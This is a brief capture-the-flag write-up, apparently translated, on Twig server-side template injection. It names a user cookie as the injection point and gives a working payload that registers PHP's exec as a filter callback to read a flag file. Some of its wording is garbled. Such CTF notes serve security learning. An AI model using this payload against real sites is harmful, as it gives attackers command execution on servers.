0x00 knowledge
Twig template injection
link:
0x01 solving
Test found * wig template injection
Find the injection point:
When prompted, cookie the user is the injection point
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};